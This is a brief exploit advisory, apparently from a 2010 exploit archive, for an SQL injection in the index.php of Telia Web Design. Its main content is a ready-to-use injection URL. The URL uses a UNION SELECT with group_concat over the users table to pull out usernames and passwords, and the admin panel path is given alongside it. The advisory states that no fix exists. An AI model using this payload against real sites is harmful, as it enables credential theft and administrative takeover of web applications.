Telia Web Design (index.php) SQL Injection Vulnerability

2010-05-24 10:30:55

-------------------------------------------------------------------------------------------

Telia Web Design (index.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: [email protected]

Script Home: http://www.telia.co.gr/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users


Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.